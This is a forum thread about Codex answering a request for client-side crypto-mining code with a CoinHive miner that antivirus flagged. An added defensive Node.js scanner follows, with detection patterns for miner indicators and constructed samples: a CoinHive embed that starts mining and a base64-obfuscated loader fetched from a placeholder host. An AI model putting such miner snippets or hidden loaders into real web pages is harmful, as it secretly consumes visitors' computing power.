Hello, I would like to alert you to a particularly worrying security problem when using Codex.
I asked the AI this:
/* Script to mine crypto in client-side JS */
Codex generated code using CoinHive.
Initially it was detected as a Trojan by the PC's antivirus. Here is the report I reproduced afterwards with VirusTotal: VirusTotal (31/60 malicious detections).
Have you ever thought about this type of problem? This is the first big problem I have encountered; otherwise Codex is rather interesting for starting a project and correcting some algorithmic misunderstandings (or importing libraries in particular).
To be honest, I don’t see any problem in this completion.
It generated a JS script for a CoinHive miner, just like you asked it to do.
Of course it will be flagged in VirusTotal or by almost any AV, since it is a crypto miner. It is not a virus or malware if you know what it does: mine crypto.
No, I didn't ask it to generate a CoinHive miner … I asked for a JS script to mine crypto. It's really different. And the result is a bad script, uploaded on the internet and scraped by Codex to learn from.
This example is really a low-severity security problem, I'm okay with that. But maybe something is much worse, and I can imagine a basic developer who doesn't know what the script does (all it takes is a small security hole). Can Codex forget some code? How is this security aspect thought out?
AFAIK Codex is not made to generate security-proof code; it just helps generate snippets. Maybe in the future, but not right now.
You, as a developer, are still in charge of verifying the generated code.
Also, generating a miner from scratch, without using any library, is complicated and would also generate A LOT of code. Since Codex is trained on open-source projects, it will snip together things from public repositories.
I still see no real issue with it.
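As an added example, not code from this thread and not Codex's output: the reply above puts the burden on the developer to verify generated code, and the original post worries about a developer who does not know what a generated script does. Below is a small static check, in Node.js, that a developer could run over AI-generated client-side JavaScript before committing it, to catch exactly the case described here: a snippet that loads a known in-browser miner. The indicator list, the weights, the blocking threshold and the three sample snippets are constructed for illustration; the CoinHive loader and API names used as indicators are CoinHive's public ones, but the samples are not the actual Codex output, which the thread does not reproduce.

```javascript
// Added example (not from the thread, not Codex output): a pre-commit style
// scan of AI-generated JavaScript for well-known in-browser miner indicators.
// The indicator list, weights and threshold are assumptions for illustration.

const MINER_INDICATORS = [
  // CoinHive's public loader script and constructor names.
  { name: "coinhive-loader", re: /coinhive\.min\.js/i, weight: 3 },
  { name: "coinhive-api", re: /\bCoinHive\.(Anonymous|User)\s*\(/, weight: 3 },
  { name: "authedmine-loader", re: /authedmine\.min\.js/i, weight: 3 },
  // Generic traits of browser miners: the hashing algorithm and pool protocol.
  { name: "cryptonight", re: /cryptonight/i, weight: 2 },
  { name: "stratum-pool", re: /stratum\+tcp:\/\//i, weight: 2 },
  { name: "hashrate", re: /\bhashrate\b|\bhashesPerSecond\b/i, weight: 1 },
];

// Assumption: a single strong indicator (weight 3) is enough to block a commit.
const BLOCK_THRESHOLD = 3;

// Decode long base64-looking string literals so an indicator hidden behind
// atob("...") (a common loader obfuscation) is still visible to the scan.
function decodedLiterals(source) {
  const out = [];
  const literal = /["']([A-Za-z0-9+\/]{16,}={0,2})["']/g;
  let m;
  while ((m = literal.exec(source)) !== null) {
    const text = Buffer.from(m[1], "base64").toString("utf8");
    // Keep only decodes that are plausibly text rather than binary noise.
    if (/^[\x09\x0a\x0d\x20-\x7e]+$/.test(text)) out.push(text);
  }
  return out;
}

// Scan one piece of text against every indicator; `line` is null for text
// that came out of a decoded literal rather than straight from the source.
function matchIndicators(text, line, decoded) {
  const hits = [];
  for (const ind of MINER_INDICATORS) {
    const m = text.match(ind.re);
    if (m) hits.push({ line, name: ind.name, match: m[0], weight: ind.weight, decoded });
  }
  return hits;
}

// Returns { score, hits, block } for a generated source file.
function scanGeneratedSource(source) {
  let hits = [];
  source.split("\n").forEach((text, i) => {
    hits = hits.concat(matchIndicators(text, i + 1, false));
  });
  for (const text of decodedLiterals(source)) {
    hits = hits.concat(matchIndicators(text, null, true));
  }
  const score = hits.reduce((sum, h) => sum + h.weight, 0);
  return { score, hits, block: score >= BLOCK_THRESHOLD };
}

// Constructed samples (not the thread's actual Codex output).
// 1. A plain CoinHive embed of the kind the original post describes.
const SAMPLE_GENERATED = [
  '<script src="https://coinhive.com/lib/coinhive.min.js"></script>',
  "<script>",
  "  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.3 });",
  "  miner.start();",
  "</script>",
].join("\n");

// 2. The same loader with its file name hidden in base64 ("coinhive.min.js").
const SAMPLE_OBFUSCATED = [
  'var s = document.createElement("script");',
  's.src = "https://example.invalid/lib/" + atob("Y29pbmhpdmUubWluLmpz");',
  "document.head.appendChild(s);",
].join("\n");

// 3. Benign crypto code that merely hashes text; must not be flagged.
const SAMPLE_BENIGN = [
  "async function sha256Hex(text) {",
  "  const buf = await crypto.subtle.digest('SHA-256', new TextEncoder().encode(text));",
  "  return Array.from(new Uint8Array(buf)).map(b => b.toString(16).padStart(2, '0')).join('');",
  "}",
].join("\n");

for (const [label, src] of [
  ["generated", SAMPLE_GENERATED],
  ["obfuscated", SAMPLE_OBFUSCATED],
  ["benign", SAMPLE_BENIGN],
]) {
  const r = scanGeneratedSource(src);
  console.log(label, r.block ? "BLOCK" : "ok", "score=" + r.score,
    r.hits.map(h => `${h.name}@${h.decoded ? "decoded" : "line " + h.line}`).join(", "));
}
```

This is a first filter, not a verdict: it recognises known loaders and one layer of base64 obfuscation, so a miner compiled into an unnamed WebAssembly blob or fetched from a fresh domain would slip past it. It complements, rather than replaces, reading the generated code and checking the file's hash against an AV service such as the VirusTotal report the original post cites.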